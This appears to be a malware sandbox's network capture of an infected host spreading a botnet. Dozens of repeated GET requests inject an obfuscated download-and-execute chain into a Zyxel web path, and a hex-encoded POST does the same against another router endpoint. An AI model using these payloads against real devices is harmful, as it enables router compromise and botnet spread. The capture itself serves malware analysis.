                                            Jan 14, 2024 15:50:47.595510006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6595192.168.2.2351202155.73.93.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595562935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6596192.168.2.2335862221.156.87.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595587969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6597192.168.2.2352886153.29.155.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595599890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6598192.168.2.235610277.189.185.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595662117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6599192.168.2.233391881.22.241.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595688105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6600192.168.2.2353612148.26.44.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595696926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6601192.168.2.233357459.172.59.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595748901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6602192.168.2.2356268120.130.193.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595788002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6603192.168.2.2340890195.119.215.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595788002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6604192.168.2.2356186149.177.239.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595798969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6605192.168.2.2351778203.84.219.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595845938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6606192.168.2.2338338150.122.154.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595866919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6607192.168.2.234007275.92.197.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595912933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6608192.168.2.2342508144.92.102.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595927954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6609192.168.2.235236444.61.177.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595969915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6610192.168.2.2353172190.102.206.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.595998049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6611192.168.2.234085627.84.136.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596024990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6612192.168.2.2348858132.133.171.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596048117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6613192.168.2.233570812.111.95.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596075058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6614192.168.2.234101092.93.86.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596103907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6615192.168.2.236046889.191.157.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596136093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6616192.168.2.23563869.13.87.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596170902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6617192.168.2.2350752161.144.37.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596196890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6618192.168.2.2341316172.167.96.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596230030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6619192.168.2.233493867.252.215.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596246004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6620192.168.2.235132094.157.245.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596261024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6621192.168.2.233490835.5.114.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596302032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6622192.168.2.2336750213.123.4.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596335888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6623192.168.2.2333044195.111.106.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596353054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6624192.168.2.234776453.111.117.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596411943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6625192.168.2.235713852.237.89.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596419096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6626192.168.2.2349130202.129.202.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596431017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6627192.168.2.233387061.132.128.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596463919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6628192.168.2.2359470109.232.199.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596477032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6629192.168.2.2352602141.48.22.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596517086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6630192.168.2.2343428163.139.126.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596543074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6631192.168.2.2339488171.123.215.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596566916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6632192.168.2.2335664176.237.16.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596580982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6633192.168.2.233896892.157.123.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596613884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6634192.168.2.234369031.124.53.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596643925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6635192.168.2.235112818.245.214.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596694946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6636192.168.2.235739846.244.174.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596708059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6637192.168.2.2350608148.214.74.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596735001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6638192.168.2.234707212.11.208.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.596770048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6639192.168.2.233920277.247.60.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600081921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6640192.168.2.2340220216.22.121.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600095034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6641192.168.2.2335604173.132.252.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600116968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6642192.168.2.2340596172.84.47.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600152969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6643192.168.2.234384294.70.249.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600200891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6644192.168.2.2355224177.144.6.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600244045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6645192.168.2.2344628167.189.230.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600256920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6646192.168.2.2338548204.23.225.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600277901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6647192.168.2.234686450.244.233.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600303888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6648192.168.2.2334756133.17.100.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600387096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6649192.168.2.2333300138.37.103.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600419998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6650192.168.2.23349642.118.240.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600435972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6651192.168.2.233508893.236.40.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600487947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6652192.168.2.2358606131.239.84.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600518942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6653192.168.2.2338486191.7.165.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600524902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6654192.168.2.2336956123.164.169.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.600543022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6655192.168.2.235448038.54.110.548080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.804409027 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
